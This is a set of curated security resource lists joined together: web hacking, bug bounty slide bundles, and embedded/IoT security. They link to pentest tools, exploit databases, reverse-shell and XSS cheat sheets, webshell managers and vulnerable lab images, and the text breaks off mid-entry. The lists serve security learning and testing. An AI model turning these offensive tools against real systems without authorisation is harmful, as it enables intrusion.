[https://github.com/nyxxxie/awesome-default-passwords](https://github.com/nyxxxie/awesome-default-passwords) * [https://github.com/arnaudsoullie/ics-default-passwords](https://github.com/arnaudsoullie/ics-default-passwords) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar)
# awesome-web-hacking This list is for anyone wishing to learn about web application security but do not have a starting point. You can help by sending Pull Requests to add more information. If you're not inclined to make PRs you can tweet me at `@infoslack` Table of Contents ================= * [Books](#books) * [Documentation](#documentation) * [Tools](#tools) * [Cheat Sheets](#cheat-sheets) * [Docker](#docker-images-for-penetration-testing) * [Vulnerabilities](#vulnerabilities) * [Courses](#courses) * [Online Hacking Demonstration Sites](#online-hacking-demonstration-sites) * [Labs](#labs) * [SSL](#ssl) * [Security Ruby on Rails](#security-ruby-on-rails) ## Books * http://www.amazon.com/The-Web-Application-Hackers-Handbook/dp/8126533404/ The Web Application Hackerโ€™s Handbook: Finding and Exploiting Security Flaws * http://www.amazon.com/Hacking-Web-Apps-Preventing-Application/dp/159749951X/ Hacking Web Apps: Detecting and Preventing Web Application Security Problems * http://www.amazon.com/Hacking-Exposed-Web-Applications-Third/dp/0071740643/ Hacking Exposed Web Applications * http://www.amazon.com/SQL-Injection-Attacks-Defense-Second/dp/1597499633/ SQL Injection Attacks and Defense * http://www.amazon.com/Tangled-Web-Securing-Modern-Applications/dp/1593273886/ The Tangled WEB: A Guide to Securing Modern Web Applications * http://www.amazon.com/Web-Application-Obfuscation-Evasion-Filters/dp/1597496049/ Web Application Obfuscation: '-/WAFs..Evasion..Filters//alert(/Obfuscation/)-' * http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/1597491543/ XSS Attacks: Cross Site Scripting Exploits and Defense * http://www.amazon.com/Browser-Hackers-Handbook-Wade-Alcorn/dp/1118662091/ The Browser Hackerโ€™s Handbook * http://www.amazon.com/Basics-Web-Hacking-Techniques-Attack/dp/0124166008/ The Basics of Web Hacking: Tools and Techniques to Attack the Web * http://www.amazon.com/Web-Penetration-Testing-Kali-Linux/dp/1782163166/ Web Penetration Testing with Kali Linux * http://www.amazon.com/Web-Application-Security-Beginners-Guide/dp/0071776168/ Web Application Security, A Beginner's Guide * https://www.crypto101.io/ - Crypto 101 is an introductory course on cryptography * http://www.offensive-security.com/metasploit-unleashed/ - Metasploit Unleashed * http://www.cl.cam.ac.uk/~rja14/book.html - Security Engineering * https://www.feistyduck.com/library/openssl-cookbook/ - OpenSSL Cookbook ## Documentation * https://www.owasp.org/ - Open Web Application Security Project * http://www.pentest-standard.org/ - Penetration Testing Execution Standard * http://www.binary-auditing.com/ - Dr. Thorsten Schneiderโ€™s Binary Auditing * https://appsecwiki.com/ - Application Security Wiki is an initiative to provide all Application security related resources to Security Researchers and developers at one place. ## Tools * http://www.metasploit.com/ - World's most used penetration testing software * http://www.arachni-scanner.com/ - Web Application Security Scanner Framework * https://github.com/sullo/nikto - Nikto web server scanner * http://www.tenable.com/products/nessus-vulnerability-scanner - Nessus Vulnerability Scanner * http://www.portswigger.net/burp/intruder.html - Burp Intruder is a tool for automating customized attacks against web apps. * http://www.openvas.org/ - The world's most advanced Open Source vulnerability scanner and manager. * https://github.com/iSECPartners/Scout2 - Security auditing tool for AWS environments * https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project - Is a multi threaded java application designed to brute force directories and files names on web/application servers. * https://www.owasp.org/index.php/ZAP - The Zed Attack Proxy is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. * https://github.com/tecknicaltom/dsniff - dsniff is a collection of tools for network auditing and penetration testing. ย  * https://github.com/WangYihang/Webshell-Sniper - Manage your webshell via terminal. ย  * https://github.com/DanMcInerney/dnsspoof - DNS spoofer. Drops DNS responses from the router and replaces it with the spoofed DNS response * https://github.com/trustedsec/social-engineer-toolkit - The Social-Engineer Toolkit (SET) repository from TrustedSec * https://github.com/sqlmapproject/sqlmap - Automatic SQL injection and database takeover tool * https://github.com/beefproject/beef - The Browser Exploitation Framework Project * http://w3af.org/ - w3af is a Web Application Attack and Audit Framework * https://github.com/espreto/wpsploit - WPSploit, Exploiting Wordpress With Metasploit ย  * https://github.com/WangYihang/Reverse-Shell-Manager - Reverse shell manager via terminal. ย  * https://github.com/RUB-NDS/WS-Attacker - WS-Attacker is a modular framework for web services penetration testing * https://github.com/wpscanteam/wpscan - WPScan is a black box WordPress vulnerability scanner * http://sourceforge.net/projects/paros/ Paros proxy * https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project Web Scarab proxy * https://code.google.com/p/skipfish/ Skipfish, an active web application security reconnaissance tool * http://www.acunetix.com/vulnerability-scanner/ Acunetix Web Vulnerability Scanner * https://cystack.net/ CyStack Web Security Platform * http://www-03.ibm.com/software/products/en/appscan IBM Security AppScan * https://www.netsparker.com/web-vulnerability-scanner/ Netsparker web vulnerability scanner * http://www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/index.html HP Web Inspect * https://github.com/sensepost/wikto Wikto - Nikto for Windows with some extra features * http://samurai.inguardians.com Samurai Web Testing Framework * https://code.google.com/p/ratproxy/ Ratproxy * http://www.websecurify.com Websecurify * http://sourceforge.net/projects/grendel/ Grendel-scan * https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project DirBuster * http://www.edge-security.com/wfuzz.php Wfuzz * http://wapiti.sourceforge.net wapiti * https://github.com/neuroo/grabber Grabber * https://subgraph.com/vega/ Vega * http://websecuritytool.codeplex.com Watcher passive web scanner * http://xss.codeplex.com x5s XSS and Unicode transformations security testing assistant * http://www.beyondsecurity.com/avds AVDS Vulnerability Assessment and Management * http://www.golismero.com Golismero * http://www.ikare-monitoring.com IKare * http://www.nstalker.com N-Stalker X * https://www.rapid7.com/products/nexpose/index.jsp Nexpose * http://www.rapid7.com/products/appspider/ App Spider * http://www.milescan.com ParosPro * https://www.qualys.com/enterprises/qualysguard/web-application-scanning/ Qualys Web Application Scanning * http://www.beyondtrust.com/Products/RetinaNetworkSecurityScanner/ Retina * https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Xenotix XSS Exploit Framework * https://github.com/future-architect/vuls Vulnerability scanner for Linux, agentless, written in golang. * https://github.com/rastating/wordpress-exploit-framework A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems. * http://www.xss-payloads.com/ XSS Payloads to leverage XSS vulnerabilities, build custom payloads, practice penetration testing skills. * https://github.com/joaomatosf/jexboss JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool * https://github.com/commixproject/commix Automated All-in-One OS command injection and exploitation tool * https://github.com/pathetiq/BurpSmartBuster A Burp Suite content discovery plugin that add the smart into the Buster! * https://github.com/GoSecure/csp-auditor Burp and ZAP plugin to analyze CSP headers * https://github.com/ffleming/timing_attack Perform timing attacks against web applications * https://github.com/lalithr95/fuzzapi Fuzzapi is a tool used for REST API pentesting * https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF) * https://github.com/nccgroup/wssip Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa. * https://github.com/tijme/angularjs-csti-scanner Automated client-side template injection (sandbox escape/bypass) detection for AngularJS (ACSTIS). * https://reshift.softwaresecured.com A source code analysis tool for detecting and managing Java security vulnerabilities. ## Cheat Sheets * http://n0p.net/penguicon/php_app_sec/mirror/xss.html - XSS cheatsheet * https://highon.coffee/blog/lfi-cheat-sheet/ - LFI Cheat Sheet * https://highon.coffee/blog/reverse-shell-cheat-sheet/ - Reverse Shell Cheat Sheet * https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ - SQL Injection Cheat Sheet * https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/ - Path Traversal Cheat Sheet: Windows ## Docker images for Penetration Testing * `docker pull kalilinux/kali-linux-docker` [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) * `docker pull owasp/zap2docker-stable` - [official OWASP ZAP](https://github.com/zaproxy/zaproxy) * `docker pull wpscanteam/wpscan` - [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) * `docker pull pandrew/metasploit` - [docker-metasploit](https://hub.docker.com/r/pandrew/metasploit/) * `docker pull citizenstig/dvwa` - [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/citizenstig/dvwa/) * `docker pull wpscanteam/vulnerablewordpress` - [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerablewordpress/) * `docker pull hmlio/vaas-cve-2014-6271` - [Vulnerability as a service: Shellshock](https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/) * `docker pull hmlio/vaas-cve-2014-0160` - [Vulnerability as a service: Heartbleed](https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/) * `docker pull opendns/security-ninjas` - [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) * `docker pull usertaken/archlinux-pentest-lxde` - [Arch Linux Penetration Tester](https://hub.docker.com/r/usertaken/archlinux-pentest-lxde/) * `docker pull diogomonica/docker-bench-security` - [Docker Bench for Security](https://hub.docker.com/r/diogomonica/docker-bench-security/) * `docker pull ismisepaul/securityshepherd` - [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) * `docker pull danmx/docker-owasp-webgoat` - [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) * `docker pull citizenstig/nowasp` - [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) ## Vulnerabilities * http://cve.mitre.org/ - Common Vulnerabilities and Exposures. The Standard for Information Security Vulnerability Names * https://www.exploit-db.com/ - The Exploit Database โ€“ ultimate archive of Exploits, Shellcode, and Security Papers. * http://0day.today/ - Inj3ct0r is the ultimate database of exploits and vulnerabilities and a great resource for vulnerability researchers and security professionals. * http://osvdb.org/ - OSVDB's goal is to provide accurate, detailed, current, and unbiased technical security information. * http://www.securityfocus.com/ - Since its inception in 1999, SecurityFocus has been a mainstay in the security community. * http://packetstormsecurity.com/ - Global Security Resource * https://wpvulndb.com/ - WPScan Vulnerability Database ## Courses * https://www.elearnsecurity.com/course/web_application_penetration_testing/ eLearnSecurity Web Application Penetration Testing * https://www.elearnsecurity.com/course/web_application_penetration_testing_extreme/ eLearnSecurity Web Application Penetration Testing eXtreme * https://www.offensive-security.com/information-security-training/advanced-web-attack-and-exploitation/ Offensive Security Advanced Web Attacks and Exploitation (live) * https://www.sans.org/course/web-app-penetration-testing-ethical-hacking Sans SEC542: Web App Penetration Testing and Ethical Hacking * https://www.sans.org/course/advanced-web-app-penetration-testing-ethical-hacking Sans SEC642: Advanced Web App Penetration Testing and Ethical Hacking * http://opensecuritytraining.info/ - Open Security Training * http://securitytrainings.net/security-trainings/ - Security Exploded Training * http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/ - FSU - Offensive Computer Security * http://www.cs.fsu.edu/~lawrence/OffNetSec/ - FSU - Offensive Network Security * http://www.securitytube.net/ - Worldโ€™s largest Infosec and Hacking Portal. * https://www.hacker101.com/ - Free class for web security by [Hackerone](https://www.hackerone.com) ## Online Hacking Demonstration Sites * http://testasp.vulnweb.com/ - Acunetix ASP test and demonstration site * http://testaspnet.vulnweb.com/ - Acunetix ASP.Net test and demonstration site * http://testphp.vulnweb.com/ - Acunetix PHP test and demonstration site * http://crackme.cenzic.com/kelev/view/home.php - Crack Me Bank * http://zero.webappsecurity.com/ - Zero Bank * http://demo.testfire.net/ - Altoro Mutual ## Labs * http://www.cis.syr.edu/~wedu/seed/all_labs.html - Developing Instructional Laboratories for Computer SEcurity EDucation * https://www.vulnhub.com/ - Virtual Machines for Localhost Penetration Testing. * https://pentesterlab.com/ - PentesterLab is an easy and great way to learn penetration testing. * https://github.com/jerryhoff/WebGoat.NET - This web application is a learning platform about common web security flaws. * http://www.dvwa.co.uk/ - Damn Vulnerable Web Application (DVWA) * http://sourceforge.net/projects/lampsecurity/ - LAMPSecurity Training * https://github.com/Audi-1/sqli-labs - SQLI labs to test error based, Blind boolean based, Time based. * https://github.com/paralax/lfi-labs - small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns * https://hack.me/ - Build, host and share vulnerable web apps in a sandboxed environment for free * http://azcwr.org/az-cyber-warfare-ranges - Free live fire Capture the Flag, blue team, red team Cyber Warfare Range for beginners through advanced users. Must use a cell phone to send a text message requesting access to the range. * https://github.com/adamdoupe/WackoPicko - WackoPicko is a vulnerable web application used to test web application vulnerability scanners. * https://github.com/rapid7/hackazon - Hackazon is a free, vulnerable test site that is an online storefront built with the same technologies used in todayโ€™s rich client and mobile applications. * https://github.com/RhinoSecurityLabs/cloudgoat - Rhino Security Labs' "Vulnerable by Design" AWS infrastructure setup tool * https://www.hackthebox.eu/ - Hack The Box is an online platform allowing you to test and advance your skills in cyber security. ## SSL * https://www.ssllabs.com/ssltest/index.html - This service performs a deep analysis of the configuration of any SSL web server on the public Internet. * https://raymii.org/s/tutorials/Strong_SSL_Security_On_nginx.html - Strong SSL Security on nginx * https://weakdh.org/ - Weak Diffie-Hellman and the Logjam Attack * https://letsencrypt.org/ - Letโ€™s Encrypt is a new Certificate Authority: Itโ€™s free, automated, and open. * https://filippo.io/Heartbleed/ - A checker (site and tool) for CVE-2014-0160 (Heartbleed). ## Security Ruby on Rails * http://brakemanscanner.org/ - A static analysis security vulnerability scanner for Ruby on Rails applications. * https://github.com/rubysec/ruby-advisory-db - A database of vulnerable Ruby Gems * https://github.com/rubysec/bundler-audit - Patch-level verification for Bundler * https://github.com/hakirisec/hakiri_toolbelt - Hakiri Toolbelt is a command line interface for the Hakiri platform. * https://hakiri.io/facets - Scan Gemfile.lock for vulnerabilities. * http://rails-sqli.org/ - This page lists many query methods and options in ActiveRecord which do not sanitize raw SQL arguments and are not intended to be called with unsafe user input. * https://github.com/0xsauby/yasuo - A ruby script that scans for vulnerable & exploitable 3rd-party web applications on a network
# All-in-one_BugBounty_PDF_bundles ### All-in-one_PDF [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/1ndianl33t) [ All-in-one-Recon-by_@1ndianl33t ](https://drive.google.com/file/d/1uBTra6_jwhLnZALJVp9hmHaty2pBBUH2/view?usp=drivesdk) [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/NahamSec) [ VirSecCon-All-in-one-slides-by_@1ndianl33t ](https://drive.google.com/file/d/1sbqEQxOGeHeKQCh8JbAhElN6PLYBS7zZ/view?usp=drivesdk) # NahamCon2020 All slides (13/06/2020 ==> 14/06/2020) ### Slides [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/jhaddix) [ The Bug Hunterโ€™s Methodology v4 Recon ](https://drive.google.com/file/d/1aG_qqRvNW-s5_8vvPk5rJiMSMeNL2uY9/view?usp=drivesdk) [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/TomNomNom) [ Who, What, Where, When, Wordlist ](https://tomnomnom.com/talks/wwwww.pdf) [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/securinti) [ YouveGotPwned ](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view) [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/samwcyo) [ Owning Online Games with only web hacking Experience ](https://docs.google.com/presentation/d/1Wsv1TxfTw13P6rXjq8Qs8AxiO3Q9NVy0XaoU_kesyHs/mobilepresent?slide=id.g885f70f169_0_975 ) [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/defparam) [ Practical Attacks using Http Request Smuggling ](https://drive.google.com/file/d/1iC0972G4meFPGTmqfs8g61qat7ZYLQgf/view) [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/snyff) [ JWT: jku x5u attacking json web tokens ](https://www.slideshare.net/mobile/snyff/jwt-jku-x5u) [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/jcran) [ Intrigue Core โ€“ Scaling Assessment Automation (NahamCon Presentation) ](https://core.intrigue.io/)
<div align="center"> <img width="500" height="350" src="iot_awesome_logo.svg" alt="Awesome"> <br /> </div> # Awesome Embedded and IoT Security [![Awesome](https://awesome.re/badge.svg)](https://awesome.re) > A curated list of awesome resources about embedded and IoT security. The list contains software and hardware tools, books, research papers and more. Botnets like [Mirai](<https://en.wikipedia.org/wiki/Mirai_(malware)>) have proven that there is a need for more security in embedded and IoT devices. This list shall help beginners and experts to find helpful resources on the topic. If you are a beginner, you should have a look at the <ins>*Books*</ins> and <ins>*Case Studies*</ins> sections. If you want to start right away with your own analysis, you should give the <ins>*Analysis Frameworks*</ins> a try. They are easy to use and you do not need to be an expert to get first meaningful results. > Items marked with :euro: are comercial products. ## Contents - [Software Tools](#software-tools) - [Analysis Frameworks](#analysis-frameworks) - [Analysis Tools](#analysis-tools) - [Extraction Tools](#extraction-tools) - [Support Tools](#support-tools) - [Misc Tools](#misc-tools) - [Hardware Tools](#hardware-tools) - [Bluetooth BLE Tools](#bluetooth-ble-tools) - [ZigBee Tools](#zigbee-tools) - [SDR Tools](#sdr-tools) - [RFID NFC Tools](#rfid-nfc-tools) - [Books](#books) - [Research Papers](#research-papers) - [Case Studies](#case-studies) - [Free Training](#free-training) - [Websites](#websites) - [Blogs](#blogs) - [Tutorials and Technical Background](#tutorials-and-technical-background) - [Conferences](#conferences) - [Contribute](#contribute) - [License](#license) ## Software Tools Software tools for analyzing embedded/IoT devices and firmware. ### Analysis Frameworks - [EXPLIoT](https://gitlab.com/expliot_framework/expliot) - Pentest framework like Metasploit but specialized for IoT. - [FACT - The Firmware Analysis and Comparison Tool](https://fkie-cad.github.io/FACT_core/) - Full-featured static analysis framework including extraction of firmware, analysis utilizing different plug-ins and comparison of different firmware versions. - [Improving your firmware security analysis process with FACT](https://passthesalt.ubicast.tv/videos/improving-your-firmware-security-analysis-process-with-fact/) - Conference talk about FACT :tv:. - [FwAnalyzer](https://github.com/cruise-automation/fwanalyzer) - Analyze security of firmware based on customized rules. Intended as additional step in DevSecOps, similar to CI. - [HAL โ€“ The Hardware Analyzer](https://github.com/emsec/hal) - A comprehensive reverse engineering and manipulation framework for gate-level netlists. - [HomePWN](https://github.com/ElevenPaths/HomePWN) - Swiss Army Knife for Pentesting of IoT Devices. - [IoTSecFuzz](https://gitlab.com/invuls/iot-projects/iotsecfuzz) - Framework for automatisation of IoT layers security analysis: hardware, software and communication. - [Killerbee](https://github.com/riverloopsec/killerbee) - Framework for Testing & Auditing ZigBee and IEEE 802.15.4 Networks. - [PRET](https://github.com/RUB-NDS/PRET) - Printer Exploitation Toolkit. - [Routersploit](https://github.com/threat9/routersploit) - Framework dedicated to exploit embedded devices. ### Analysis Tools - [Binwalk](https://github.com/ReFirmLabs/binwalk) - Searches a binary for "interesting" stuff, as well as extracts arbitrary files. - [emba](https://github.com/e-m-b-a/emba) - Analyze Linux-based firmware of embedded devices. - [Firmadyne](https://github.com/firmadyne/firmadyne) - Tries to emulate and pentest a firmware. - [Firmwalker](https://github.com/craigz28/firmwalker) - Searches extracted firmware images for interesting files and information. - [Firmware Slap](https://github.com/ChrisTheCoolHut/Firmware_Slap) - Discovering vulnerabilities in firmware through concolic analysis and function clustering. - [Ghidra](https://ghidra-sre.org/) - Software Reverse Engineering suite; handles arbitrary binaries, if you provide CPU architecture and endianness of the binary. - [Radare2](https://github.com/radare/radare2) - Software Reverse Engineering framework, also handles popular formats and arbitrary binaries, has an extensive command line toolset. - [Trommel](https://github.com/CERTCC/trommel) - Searches extracted firmware images for interesting files and information. ### Extraction Tools - [FACT Extractor](https://github.com/fkie-cad/fact_extractor) - Detects container format automatically and executes the corresponding extraction tool. - [Firmware Mod Kit](https://github.com/rampageX/firmware-mod-kit/wiki) - Extraction tools for several container formats. - [The SRecord package](http://srecord.sourceforge.net/) - Collection of tools for manipulating EPROM files (can convert lots of binary formats). ### Support Tools - [JTAGenum](https://github.com/cyphunk/JTAGenum) - Add JTAG capabilities to an Arduino. - [OpenOCD](http://openocd.org/) - Free and Open On-Chip Debugging, In-System Programming and Boundary-Scan Testing. ### Misc Tools - [Cotopaxi](https://github.com/Samsung/cotopaxi) - Set of tools for security testing of Internet of Things devices using specific network IoT protocols. - [dumpflash](https://github.com/ohjeongwook/dumpflash) - Low-level NAND Flash dump and parsing utility. - [flashrom](https://github.com/flashrom/flashrom) - Tool for detecting, reading, writing, verifying and erasing flash chips. - [Samsung Firmware Magic](https://github.com/chrivers/samsung-firmware-magic) - Decrypt Samsung SSD firmware updates. ## Hardware Tools - [Bus Blaster](http://dangerousprototypes.com/docs/Bus_Blaster) - Detects and interacts with hardware debug ports like [UART](https://en.wikipedia.org/wiki/Universal_asynchronous_receiver-transmitter) and [JTAG](https://en.wikipedia.org/wiki/JTAG). - [Bus Pirate](http://dangerousprototypes.com/docs/Bus_Pirate) - Detects and interacts with hardware debug ports like UART and JTAG. - [Shikra](https://int3.cc/products/the-shikra) - Detects and interacts with hardware debug ports like UART and JTAG. Among other protocols. - [JTAGULATOR](http://www.grandideastudio.com/jtagulator/) - Detects JTAG Pinouts fast. - [Saleae](https://www.saleae.com/) - Easy to use Logic Analyzer that support many protocols :euro:. - [Ikalogic](https://www.ikalogic.com/pages/logic-analyzer-sp-series-sp209) - Alternative to Saleae logic analyzers :euro:. - [HydraBus](https://hydrabus.com/hydrabus-1-0-specifications/) - Open source multi-tool hardware similar to the BusPirate but with NFC capabilities. - [ChipWhisperer](https://newae.com/chipwhisperer/) - Detects Glitch/Side-channel attacks. - [Glasgow](https://github.com/GlasgowEmbedded/Glasgow) - Tool for exploring and debugging different digital interfaces. - [J-Link](https://www.segger.com/products/debug-probes/j-link/models/model-overview/) - J-Link offers USB powered JTAG debug probes for multiple different CPU cores :euro:. ### Bluetooth BLE Tools - [UberTooth One](https://greatscottgadgets.com/ubertoothone/) - Open source 2.4 GHz wireless development platform suitable for Bluetooth experimentation. - [Bluefruit LE Sniffer](https://www.adafruit.com/product/2269) - Easy to use Bluetooth Low Energy sniffer. ### ZigBee Tools - [ApiMote](http://apimote.com) - ZigBee security research hardware for learning about and evaluating the security of IEEE 802.15.4/ZigBee systems. Killerbee compatible. - Atmel RZUSBstick - Discontinued product. Lucky if you have one! - Tool for development, debugging and demonstration of a wide range of low power wireless applications including IEEE 802.15.4, 6LoWPAN, and ZigBee networks. Killerbee compatible. - [Freakduino](https://freaklabsstore.com/index.php?main_page=product_info&cPath=22&products_id=219&zenid=fpmu2kuuk4abjf6aurt3bjnfk4) - Low Cost Battery Operated Wireless Arduino Board that can be turned into a IEEE 802.15.4 protocol sniffer. ### SDR Tools - [RTL-SDR](https://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/) - Cheapest SDR for beginners. It is a computer based radio scanner for receiving live radio signals frequencies from 500 kHz up to 1.75 GHz. - [HackRF One](https://greatscottgadgets.com/hackrf/) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 1 MHz to 6 GHz (half-duplex). - [YardStick One](https://greatscottgadgets.com/yardstickone/) - Half-duplex sub-1 GHz wireless transceiver. - [LimeSDR](https://www.crowdsupply.com/lime-micro/limesdr) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 100 KHz to 3.8 GHz (full-duplex). - [BladeRF 2.0](https://www.nuand.com/bladerf-2-0-micro/) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 47 MHz to 6 GHz (full-duplex). - [USRP B Series](https://www.ettus.com/product-categories/usrp-bus-series/) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 70 MHz to 6 GHz (full-duplex). ### RFID NFC Tools - [Proxmark 3 RDV4](https://www.proxmark.com/) - Powerful general purpose RFID tool. From Low Frequency (125kHz) to High Frequency (13.56MHz) tags. - [ChamaleonMini](http://chameleontiny.com/) - Programmable, portable tool for NFC security analysis. - [HydraNFC](https://hydrabus.com/hydranfc-1-0-specifications/) - Powerful 13.56MHz RFID / NFC platform. Read / write / crack / sniff / emulate. ## Books - 2020, Fotios Chantzis, Evangel Deirme, Ioannis Stais, Paulino Calderon, Beau Woods: [Practical IoT Hacking](https://www.amazon.com/Fotios-Chantzis-ebook/dp/B085BVVSN6/) - 2020, Jasper van Woudenberg, Colin O'Flynn: [The Hardware Hacking Handbook: Breaking Embedded Security with Hardware Attacks](https://nostarch.com/hardwarehacking) - 2019, Yago Hansen: [The Hacker's Hardware Toolkit: The best collection of hardware gadgets for Red Team hackers, Pentesters and security researchers](https://github.com/yadox666/The-Hackers-Hardware-Toolkit/blob/master/TheHackersHardwareToolkit.pdf) - 2019, Aditya Gupta: [The IoT Hacker's Handbook: A Practical Guide to Hacking the Internet of Things](https://www.apress.com/us/book/9781484242995) - 2018, Mark Swarup Tehranipoor: [Hardware Security: A Hands-on Learning Approach](https://www.elsevier.com/books/hardware-security/bhunia/978-0-12-812477-2) - 2018, Mark Carney: [Pentesting Hardware - A Practical Handbook (DRAFT)](https://github.com/unprovable/PentestHardware) - 2018, Qing Yang, Lin Huang [Inside Radio: An Attack and Defense Guide](https://link.springer.com/book/10.1007/978-981-10-8447-8) - 2017, Aditya Gupta, Aaron Guzman: [IoT Penetration Testing Cookbook](https://www.packtpub.com/networking-and-servers/iot-penetration-testing-cookbook) - 2017, Andrew Huang: [The Hardware Hacker: Adventures in Making and Breaking Hardware](https://nostarch.com/hardwarehackerpaperback) - 2016, Craig Smith: [The Car Hacker's Handbook: A Guide for the Penetration Tester](https://nostarch.com/carhacking) - 2015, Keng Tiong Ng: [The Art of PCB Reverse Engineering](https://visio-for-engineers.blogspot.com/p/order.html) - 2015, Nitesh Dhanjan: [Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts](https://shop.oreilly.com/product/0636920033547.do) - 2015, Joshua Wright , Johnny Cache: [Hacking Wireless Exposed](https://www.mhprofessional.com/9780071827638-usa-hacking-exposed-wireless-third-edition-group) - 2014, Debdeep Mukhopadhyay: [Hardware Security: Design, Threats, and Safeguards](https://www.taylorfrancis.com/books/9780429066900) - 2014, Jack Ganssle: [The Firmware Handbook (Embedded Technology)](https://www.elsevier.com/books/the-firmware-handbook/ganssle/978-0-7506-7606-9) - 2013, Andrew Huang: [Hacking the XBOX](https://nostarch.com/xboxfree) ## Research Papers <!--lint ignore match-punctuation--> - 2020, Oser et al: [SAFER: Development and Evaluation of an IoT Device Risk Assessment Framework in a Multinational Organization](https://dl.acm.org/doi/abs/10.1145/3414173) - 2019, Agarwal et al: [Detecting IoT Devices and How They Put Large Heterogeneous Networks at Security Risk](https://www.mdpi.com/1424-8220/19/19/4107) - 2019, Almakhdhub et al: [BenchIoT: A Security Benchmark for the Internet of Things](https://nebelwelt.net/publications/files/19DSN.pdf) - 2019, Alrawi et al: [SoK: Security Evaluation of Home-Based IoT Deployments](https://alrawi.github.io/static/papers/alrawi_sok_sp19.pdf) - 2019, Abbasi et al: [Challenges in Designing Exploit Mitigations for Deeply Embedded Systems](https://ieeexplore.ieee.org/abstract/document/8806725) - 2019, Song et al: [PeriScope: An Effective Probing and Fuzzing Framework for the Hardware-OS Boundary](https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_04A-1_Song_paper.pdf) - 2018, Muench et al: [What You Corrupt Is Not What You Crash: Challenges in Fuzzing Embedded Devices](http://www.eurecom.fr/en/publication/5417/download/sec-publi-5417.pdf) - 2017, O'Meara et al: [Embedded Device Vulnerability Analysis Case Study Using Trommel](https://resources.sei.cmu.edu/library/asset-view.cfm?assetid=509271) - 2017, Jacob et al: [How to Break Secure Boot on FPGA SoCs through Malicious Hardware](https://eprint.iacr.org/2017/625.pdf) - 2017, Costin et al: [Towards Automated Classification of Firmware Images and Identification of Embedded Devices](http://s3.eurecom.fr/docs/ifip17_costin.pdf) - 2016, Kammerstetter et al: [Embedded Security Testing with Peripheral Device Caching and Runtime Program State Approximation](https://www.thinkmind.org/download.php?articleid=securware_2016_2_10_30082) - 2016, Chen et al: [Towards Automated Dynamic Analysis for Linux-based Embedded Firmware](https://www.dcddcc.com/docs/2016_paper_firmadyne.pdf) - 2016, Costin et al: [Automated Dynamic Firmware Analysis at Scale: A Case Study on Embedded Web Interfaces](http://s3.eurecom.fr/docs/asiaccs16_costin.pdf) - 2015, Shoshitaishvili et al:[Firmalice - Automatic Detection of Authentication Bypass Vulnerabilities in Binary Firmware](https://www.ndss-symposium.org/wp-content/uploads/2017/09/11_1_2.pdf) - 2015, Papp et al: [Embedded Systems Security: Threats, Vulnerabilities, and Attack Taxonomy](http://www.cse.psu.edu/~pdm12/cse597g-f15/readings/cse597g-embedded_systems.pdf) - 2014, Zaddach et al: [Avatar: A Framework to Support Dynamic Security Analysis of Embedded Systems' Firmwares](http://www.eurecom.fr/en/publication/4158/download/rs-publi-4158.pdf) - 2014, Alimi et al: [Analysis of embedded applications by evolutionary fuzzing](http://ieeexplore.ieee.org/document/6903734/) - 2014, Costin et al: [A Large-Scale Analysis of the Security of Embedded Firmwares](http://www.s3.eurecom.fr/docs/usenixsec14_costin.pdf) - 2013, Davidson et al: [FIE on Firmware: Finding Vulnerabilities in Embedded Systems using Symbolic Execution](https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_davidson.pdf) ## Case Studies <!--lint ignore no-repeat-punctuation--> - [Binary Hardening in IoT products](https://cyber-itl.org/2019/08/26/iot-data-writeup.html) - [Cracking Linksys โ€œEncryptionโ€](http://www.devttys0.com/2014/02/cracking-linksys-crypto/) - [Deadly Sins Of Development](https://youtu.be/nXyglaY9N9w) - Conference talk presenting several real world examples on real bad implementations :tv:. - [Dumping firmware from a device's SPI flash with a buspirate](https://www.iotpentest.com/2019/06/dumping-firmware-from-device-using.html) - [Hacking the DSP-W215, Again](http://www.devttys0.com/2014/05/hacking-the-dspw215-again/) - [Hacking the PS4](https://cturt.github.io/ps4.html) - Introduction to PS4's security. - [IoT 